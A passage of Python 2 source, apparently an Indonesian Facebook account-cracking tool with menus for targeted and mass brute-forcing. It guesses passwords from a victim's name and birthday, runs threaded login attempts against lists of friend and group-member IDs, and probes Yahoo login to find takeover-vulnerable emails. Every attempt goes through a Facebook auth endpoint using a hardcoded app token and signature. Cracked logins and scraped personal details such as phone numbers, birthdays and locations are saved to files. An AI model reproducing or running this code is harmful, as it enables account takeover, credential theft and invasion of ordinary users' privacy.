                            print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mNomor Telpon\x1b[1;97m : ' + z['mobile_phone']
                        except KeyError:
                            print '\x1b[1;91m[?] \x1b[1;92mNomor Telpon\x1b[1;97m : \x1b[1;91mNot found'
                        try:
                            print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mLokasi\x1b[1;97m : ' + z['location']['name']
                        except KeyError:
                            print '\x1b[1;91m[?] \x1b[1;92mLokasi\x1b[1;97m : \x1b[1;91mTidak Ada'
                        try:
                            print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mLahir\x1b[1;97m : ' + z['birthday']
                        except KeyError:
                            print '\x1b[1;91m[?] \x1b[1;92mLahir\x1b[1;97m : \x1b[1;91mTidak Ada'
                        try:
                            print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mSekolah\x1b[1;97m : '
                            for q in z['education']:
                                try:
                                    print '\x1b[1;91m ~ \x1b[1;97m' + q['school']['name']
                                except KeyError:
                                    print '\x1b[1;91m ~ \x1b[1;91mTidak Ada'
                        except KeyError:
                            pass
                        raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
                        menu()
    else:
        print '\x1b[1;91m[\xe2\x9c\x96] Pengguna Tidak Ada'
        raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
        menu()
def menu_hack():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(0.01)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '║-> \x1b[1;37;40m1. Mini Hack Facebook (\x1b[1;92mTarget\x1b[1;97m)'
print '║-> \x1b[1;37;40m2. Multi Bruteforce Facebook'
print '║-> \x1b[1;37;40m3. Super Multi Bruteforce Facebook'
print '║-> \x1b[1;37;40m4. BruteForce (\x1b[1;92mTarget\x1b[1;97m)'
print '║-> \x1b[1;37;40m5. Yahoo Clone'
print '║-> \x1b[1;37;40m6. Ambil ID/Email/HP'
print '║-> \x1b[1;31;40m0. Back'
print '\x1b[1;37;40m║'
hack_pilih()
def hack_pilih():
hack = raw_input('╚═\x1b[1;91m▶\x1b[1;97m ')
if hack == '':
print '\x1b[1;91m[!] Can\'t empty'
hack_pilih()
else:
if hack == '1':
mini()
else:
if hack == '2':
crack()
hasil()
else:
if hack == '3':
super()
else:
if hack == '4':
brute()
else:
if hack == '5':
menu_yahoo()
else:
if hack == '6':
grab()
else:
if hack == '0':
menu()
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + hack + ' \x1b[1;91mNot found'
hack_pilih()
def mini():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(0.01)
login()
else:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[ INFO ] Target must be your friend !'
try:
id = raw_input('\x1b[1;91m[+] \x1b[1;92mID Target \x1b[1;91m:\x1b[1;97m ')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
r = requests.get('https://graph.facebook.com/' + id + '?access_token=' + toket)
a = json.loads(r.text)
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mName\x1b[1;97m : ' + a['name']
jalan('\x1b[1;91m[+] \x1b[1;92mChecking \x1b[1;97m...')
time.sleep(1)
jalan('\x1b[1;91m[+] \x1b[1;92mOpen security \x1b[1;97m...')
time.sleep(1)
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
pz1 = a['first_name'] + '123'
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + id + '&locale=en_US&password=' + pz1 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
y = json.load(data)
if 'access_token' in y:
print '\x1b[1;91m[+] \x1b[1;92mFounded.'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName\x1b[1;97m : ' + a['name']
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz1
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
else:
if 'www.facebook.com' in y['error_msg']:
print '\x1b[1;91m[+] \x1b[1;92mFounded.'
print '\x1b[1;91m[!] \x1b[1;93mAccount Maybe Checkpoint'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName\x1b[1;97m : ' + a['name']
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz1
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
else:
pz2 = a['first_name'] + '12345'
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + id + '&locale=en_US&password=' + pz2 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
y = json.load(data)
if 'access_token' in y:
print '\x1b[1;91m[+] \x1b[1;92mFounded.'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName\x1b[1;97m : ' + a['name']
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz2
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
else:
if 'www.facebook.com' in y['error_msg']:
print '\x1b[1;91m[+] \x1b[1;92mFounded.'
print '\x1b[1;91m[!] \x1b[1;93mAccount Maybe Checkpoint'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName\x1b[1;97m : ' + a['name']
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz2
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
else:
pz3 = a['last_name'] + '123'
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + id + '&locale=en_US&password=' + pz3 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
y = json.load(data)
if 'access_token' in y:
print '\x1b[1;91m[+] \x1b[1;92mFounded.'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName\x1b[1;97m : ' + a['name']
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz3
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
else:
if 'www.facebook.com' in y['error_msg']:
print '\x1b[1;91m[+] \x1b[1;92mFounded.'
print '\x1b[1;91m[!] \x1b[1;93mAccount Maybe Checkpoint'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName\x1b[1;97m : ' + a['name']
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz3
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
else:
lahir = a['birthday']
pz4 = lahir.replace('/', '')
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + id + '&locale=en_US&password=' + pz4 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
y = json.load(data)
if 'access_token' in y:
print '\x1b[1;91m[+] \x1b[1;92mFounded.'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName\x1b[1;97m : ' + a['name']
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz4
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
else:
if 'www.facebook.com' in y['error_msg']:
print '\x1b[1;91m[+] \x1b[1;92mFounded.'
print '\x1b[1;91m[!] \x1b[1;93mAccount Maybe Checkpoint'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName\x1b[1;97m : ' + a['name']
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz4
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
else:
pz5 = ('sayang')
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + id + '&locale=en_US&password=' + pz5 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
y = json.load(data)
if 'access_token' in y:
print '\x1b[1;91m[+] \x1b[1;92mFounded.'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName\x1b[1;97m : ' + a['name']
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz5
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
else:
if 'www.facebook.com' in y['error_msg']:
print '\x1b[1;91m[+] \x1b[1;92mFounded.'
print '\x1b[1;91m[!] \x1b[1;93mAccount Maybe Checkpoint'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName\x1b[1;97m : ' + a['name']
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz5
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
else:
print '\x1b[1;91m[!] Sorry, opening password target failed :('
print '\x1b[1;91m[!] Try other method.'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
except KeyError:
print '\x1b[1;91m[!] Terget not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
def crack():
global file
global idlist
global passw
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(0.01)
login()
else:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
idlist = raw_input('\x1b[1;91m[+] \x1b[1;92mFile ID \x1b[1;91m: \x1b[1;97m')
passw = raw_input('\x1b[1;91m[+] \x1b[1;92mPassword \x1b[1;91m: \x1b[1;97m')
try:
file = open(idlist, 'r')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
for x in range(40):
zedd = threading.Thread(target=scrak, args=())
zedd.start()
threads.append(zedd)
for zedd in threads:
zedd.join()
except IOError:
print '\x1b[1;91m[!] File not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
def scrak():
global back
global berhasil
global cekpoint
global gagal
global up
try:
buka = open(idlist, 'r')
up = buka.read().split()
while file:
username = file.readline().strip()
url = 'https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + username + '&locale=en_US&password=' + passw + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6'
data = urllib.urlopen(url)
mpsh = json.load(data)
if back == len(up):
break
if 'access_token' in mpsh:
bisa = open('Berhasil.txt', 'w')
bisa.write(username + ' | ' + passw + '\n')
bisa.close()
berhasil.append('\x1b[1;97m[\x1b[1;92m\xe2\x9c\x93\x1b[1;97m] ' + username + ' | ' + passw)
back += 1
else:
if 'www.facebook.com' in mpsh['error_msg']:
cek = open('Cekpoint.txt', 'w')
cek.write(username + ' | ' + passw + '\n')
cek.close()
cekpoint.append('\x1b[1;97m[\x1b[1;93m\xe2\x9c\x9a\x1b[1;97m] ' + username + ' | ' + passw)
back += 1
else:
gagal.append(username)
back += 1
sys.stdout.write('\r\x1b[1;91m[\x1b[1;96m\xe2\x9c\xb8\x1b[1;91m] \x1b[1;92mCrack \x1b[1;91m:\x1b[1;97m ' + str(back) + ' \x1b[1;96m>\x1b[1;97m ' + str(len(up)) + ' =>\x1b[1;92mLive\x1b[1;91m:\x1b[1;96m' + str(len(berhasil)) + ' \x1b[1;97m=>\x1b[1;93mCheck\x1b[1;91m:\x1b[1;96m' + str(len(cekpoint)))
sys.stdout.flush()
except IOError:
print '\n\x1b[1;91m[!] Connection busy'
time.sleep(0.01)
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[\xe2\x9c\x96] No connection'
def hasil():
print
print 52 * '\x1b[1;97m\xe2\x95\x90'
for b in berhasil:
print b
for c in cekpoint:
print c
print
print '\x1b[31m[x] Failed \x1b[1;97m--> ' + str(len(gagal))
keluar()
def super():
global toket
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '║-> \x1b[1;37;40m1. Crack from Friends'
print '║-> \x1b[1;37;40m2. Crack from Group'
print '║-> \x1b[1;37;40m3. Crack from File'
print '║-> \x1b[1;31;40m0. Kembali'
print '\x1b[1;37;40m║'
pilih_super()
def pilih_super():
peak = raw_input('╚═\x1b[1;91m▶\x1b[1;97m ')
if peak == '':
print '\x1b[1;91m[!] Can\'t empty'
pilih_super()
else:
if peak == '1':
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
jalan('\x1b[1;91m[+] \x1b[1;92mMengambil id Teman \x1b[1;97m...')
r = requests.get('https://graph.facebook.com/me/friends?access_token=' + toket)
z = json.loads(r.text)
for s in z['data']:
id.append(s['id'])
else:
if peak == '2':
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
idg = raw_input('\x1b[1;91m[+] \x1b[1;92mID Group \x1b[1;91m:\x1b[1;97m ')
try:
r = requests.get('https://graph.facebook.com/group/?id=' + idg + '&access_token=' + toket)
asw = json.loads(r.text)
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName grup \x1b[1;91m:\x1b[1;97m ' + asw['name']
except KeyError:
print '\x1b[1;91m[!] Group not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
super()
re = requests.get('https://graph.facebook.com/' + idg + '/members?fields=name,id&limit=999999999&access_token=' + toket)
s = json.loads(re.text)
for i in s['data']:
id.append(i['id'])
else:
if peak == '3':
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
try:
idlist = raw_input('\x1b[1;91m[+] \x1b[1;92mFile ID \x1b[1;91m: \x1b[1;97m')
for line in open(idlist,'r').readlines():
id.append(line.strip())
except IOError:
print '\x1b[1;91m[!] File not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
super()
else:
if peak == '0':
menu_hack()
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + peak + ' \x1b[1;91mTidak ada'
pilih_super()
print '\x1b[1;91m[+] \x1b[1;92mTotal ID \x1b[1;91m: \x1b[1;97m' + str(len(id))
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mMohon Tunggu \x1b[1;97m...')
titik = ['. ', '.. ', '... ']
for o in titik:
print '\r\r\x1b[1;91m[\x1b[1;96m\xe2\x9c\xb8\x1b[1;91m] \x1b[1;92mCrack \x1b[1;97m' + o,
sys.stdout.flush()
time.sleep(0.01)
print
print 52 * '\x1b[1;97m\xe2\x95\x90'
def main(arg):
user = arg
try:
a = requests.get('https://graph.facebook.com/' + user + '/?access_token=' + toket)
b = json.loads(a.text)
pass1 = b['first_name'] + '123'
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + user + '&locale=en_US&password=' + pass1 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;97m\x1b[1;92m[✓]\x1b[1;97m ' + user + ' | ' + pass1 + ' --> ' + b['name']
else:
if 'www.facebook.com' in q['error_msg']:
print '\x1b[1;97m\x1b[1;93m[+]\x1b[1;97m ' + user + ' | ' + pass1 + ' --> ' + b['name']
else:
pass2 = b['firs_name'] + '12345'
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + user + '&locale=en_US&password=' + pass2 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;97m\x1b[1;92m[✓]\x1b[1;97m ' + user + ' | ' + pass2 + ' --> ' + b['name']
else:
if 'www.facebook.com' in q['error_msg']:
print '\x1b[1;97m\x1b[1;93m[+]\x1b[1;97m ' + user + ' | ' + pass2 + ' --> ' + ['name']
else:
pass3 = b['last_name'] + '123'
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + user + '&locale=en_US&password=' + pass3 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;97m\x1b[1;92m[✓]\x1b[1;97m ' + user + ' | ' + pass3 + ' --> ' + b['name']
else:
if 'www.facebook.com' in q['error_msg']:
print '\x1b[1;97m\x1b[1;93m[+]\x1b[1;97m ' + user + ' | ' + pass3 + ' --> ' + b['name']
else:
pass4 = b['last_name'] + '12345'
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + user + '&locale=en_US&password=' + pass4 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;97m\x1b[1;92m[✓]\x1b[1;97m ' + user + ' | ' + pass4 + ' --> ' + b['name']
else:
if 'www.facebook.com' in q['error_msg']:
print '\x1b[1;97m\x1b[1;93m[+]\x1b[1;97m ' + user + ' | ' + pass4 + ' --> ' + b['name']
else:
birthday = b['birthday']
pass5 = birthday.replace('/', '')
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + user + '&locale=en_US&password=' + pass5 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;97m\x1b[1;92m[✓]\x1b[1;97m ' + user + ' | ' + pass5 + ' --> ' + b['name']
else:
if 'www.facebook.com' in q['error_msg']:
print '\x1b[1;97m[\x1b[1;93m[+]\x1b[1;97m ' + user + ' | ' + pass5 + ' --> ' + b['name']
else:
pass6 = ('sayang')
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + user + '&locale=en_US&password=' + pass6 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;97m\x1b[1;92m[✓]\x1b[1;97m ' + user + ' | ' + pass6 + ' --> ' + b['name']
else:
if 'www.facebook.com' in q['error_msg']:
print '\x1b[1;97m\x1b[1;93m[+]\x1b[1;97m ' + user + ' | ' + pass6 + ' --> ' + b['name']
except:
pass
p = ThreadPool(30)
p.map(main, id)
print '\n\x1b[1;91m[+] \x1b[1;97mSelesai'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
super()
def brute():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(0.5)
login()
else:
os.system('clear')
print logo
print '╔' + 52 * '\x1b[1;97m\xe2\x95\x90'
try:
email = raw_input('\x1b[1;91m[+] \x1b[1;92mID\x1b[1;97m/\x1b[1;92mEmail\x1b[1;97m/\x1b[1;92mHp \x1b[1;97mTarget \x1b[1;91m:\x1b[1;97m ')
passw = raw_input('\x1b[1;91m[+] \x1b[1;92mWordlist \x1b[1;97mext(list.txt) \x1b[1;91m: \x1b[1;97m')
total = open(passw, 'r')
total = total.readlines()
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mTarget \x1b[1;91m:\x1b[1;97m ' + email
print '\x1b[1;91m[+] \x1b[1;92mTotal\x1b[1;96m ' + str(len(total)) + ' \x1b[1;92mPassword'
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
sandi = open(passw, 'r')
for pw in sandi:
try:
pw = pw.replace('\n', '')
sys.stdout.write('\r\x1b[1;91m[\x1b[1;96m\xe2\x9c\xb8\x1b[1;91m] \x1b[1;92mTry \x1b[1;97m' + pw)
sys.stdout.flush()
data = requests.get('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + email + '&locale=en_US&password=' + pw + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
mpsh = json.loads(data.text)
if 'access_token' in mpsh:
dapat = open('Brute.txt', 'w')
dapat.write(email + ' | ' + pw + '\n')
dapat.close()
print '\n\x1b[1;91m[+] \x1b[1;92mFounded.'
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername \x1b[1;91m:\x1b[1;97m ' + email
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword \x1b[1;91m:\x1b[1;97m ' + pw
keluar()
else:
if 'www.facebook.com' in mpsh['error_msg']:
ceks = open('Brutecekpoint.txt', 'w')
ceks.write(email + ' | ' + pw + '\n')
ceks.close()
print '\n\x1b[1;91m[+] \x1b[1;92mFounded.'
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[!] \x1b[1;93mAccount Maybe Checkpoint'
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername \x1b[1;91m:\x1b[1;97m ' + email
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword \x1b[1;91m:\x1b[1;97m ' + pw
keluar()
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[!] Connection Error'
time.sleep(1)
except IOError:
print '\x1b[1;91m[!] File not found...'
print '\n\x1b[1;91m[!] \x1b[1;92mSepertinya kamu tidak memiliki wordlist'
tanyaw()
def tanyaw():
why = raw_input('\x1b[1;91m[?] \x1b[1;92mKamu ingin membuat wordlist ? \x1b[1;92m[y/t]\x1b[1;91m:\x1b[1;97m ')
if why == '':
print '\x1b[1;91m[!] Mohon Pilih \x1b[1;97m(y/t)'
tanyaw()
else:
if why == 'y':
wordlist()
else:
if why == 'Y':
wordlist()
else:
if why == 't':
menu_hack()
else:
if why == 'T':
menu_hack()
else:
print '\x1b[1;91m[!] Mohon Pilih \x1b[1;97m(y/t)'
tanyaw()
def menu_yahoo():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '║-> \x1b[1;37;40m1. From Friends'
print '║-> \x1b[1;37;40m2. From File'
print '║-> \x1b[1;31;40m0. Back'
print '\x1b[1;37;40m║'
yahoo_pilih()
def yahoo_pilih():
go = raw_input('╚═\x1b[1;91m▶\x1b[1;97m ')
if go == '':
print '\x1b[1;91m[!] Can\'t empty'
yahoo_pilih()
else:
if go == '1':
yahoofriends()
else:
if go == '2':
yahoolist()
else:
if go == '0':
menu_hack()
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + go + ' \x1b[1;91mTidak Ditemukan'
yahoo_pilih()
def yahoofriends():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token Tidak Ada'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
mpsh = []
jml = 0
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mMohon Tunggu \x1b[1;97m...')
friends = requests.get('https://graph.facebook.com/me/friends?access_token=' + toket)
kimak = json.loads(friends.text)
save = open('MailVuln.txt', 'w')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for w in kimak['data']:
jml += 1
mpsh.append(jml)
id = w['id']
nama = w['name']
links = requests.get('https://graph.facebook.com/' + id + '?access_token=' + toket)
z = json.loads(links.text)
try:
mail = z['email']
yahoo = re.compile('@.*')
otw = yahoo.search(mail).group()
if 'yahoo.com' in otw:
br.open('https://login.yahoo.com/config/login?.src=fpctx&.intl=id&.lang=id-ID&.done=https://id.yahoo.com')
br._factory.is_html = True
br.select_form(nr=0)
br['username'] = mail
klik = br.submit().read()
jok = re.compile('"messages.ERROR_INVALID_USERNAME">.*')
try:
pek = jok.search(klik).group()
except:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;92mEmail \x1b[1;91m:\x1b[1;91m ' + mail + ' \x1b[1;97m[\x1b[1;92m' + vulnot + '\x1b[1;97m]'
continue
if '"messages.ERROR_INVALID_USERNAME">' in pek:
save.write(mail + '\n')
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName \x1b[1;91m:\x1b[1;97m ' + nama
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mID \x1b[1;91m:\x1b[1;97m ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mEmail \x1b[1;91m:\x1b[1;97m ' + mail + ' [\x1b[1;92m' + vuln + '\x1b[1;97m]'
print 52 * '\x1b[1;97m\xe2\x95\x90'
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;92mEmail \x1b[1;91m:\x1b[1;91m ' + mail + ' \x1b[1;97m[\x1b[1;92m' + vulnot + '\x1b[1;97m]'
except KeyError:
pass
print '\n\x1b[1;91m[+] \x1b[1;97mSelesai'
print '\x1b[1;91m[+] \x1b[1;97mSimpan \x1b[1;91m:\x1b[1;97m MailVuln.txt'
save.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
menu_yahoo()
def yahoolist():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
files = raw_input('\x1b[1;91m[+] \x1b[1;92mFile \x1b[1;91m: \x1b[1;97m')
try:
total = open(files, 'r')
mail = total.readlines()
except IOError:
print '\x1b[1;91m[!] File not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_yahoo()
mpsh = []
jml = 0
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
save = open('MailVuln.txt', 'w')
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[?] \x1b[1;97mStatus \x1b[1;91m: \x1b[1;97mRed[\x1b[1;92m' + vulnot + '\x1b[1;97m] Green[\x1b[1;92m' + vuln + '\x1b[1;97m]'
print
mail = open(files, 'r').readlines()
for pw in mail:
mail = pw.replace('\n', '')
jml += 1
mpsh.append(jml)
yahoo = re.compile('@.*')
otw = yahoo.search(mail).group()
